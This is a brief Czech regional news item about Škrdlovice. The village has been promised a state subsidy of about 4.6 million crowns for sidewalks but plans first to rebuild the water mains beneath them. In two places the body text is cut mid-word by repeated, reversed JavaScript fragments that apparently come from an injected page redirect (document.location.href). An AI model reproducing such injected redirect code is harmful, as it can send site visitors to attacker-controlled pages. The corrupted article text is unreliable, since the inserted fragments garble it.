Rainbow page separator

Získali dotaci na chodníky, ale nejdříve musí opravit vodovod

Neděle, 12. prosince 2021

Škrdlovice / Chodníky podél silnice třetí třídy procházející obcí hodlají vybudovat ve Škrdlovicích; podpořit je při [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom má přislíbená dotační podpora ze Státního fondu dopravní infrastruktury. Příslib státních peněz byl vyčíslen na přibližně 4,6 milionu korun, chodníky ale ve Škrdlovicích plánují nechat postavit až po další stavební akcí, kterou je nezbytná rekonstrukce vodovodních rozvodů umístěných pod povrchem chodníků.
V příštím roce se pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to Škrdlovičtí nejdříve pokusí získat dotační příslib také na rekonstrukci vodovodních rozvodů a za předpokladu, že budou se svojí žádostí o dotační peníze úspěšní, následně jim již nebude nic bránit ve výstavbě nových chodníků.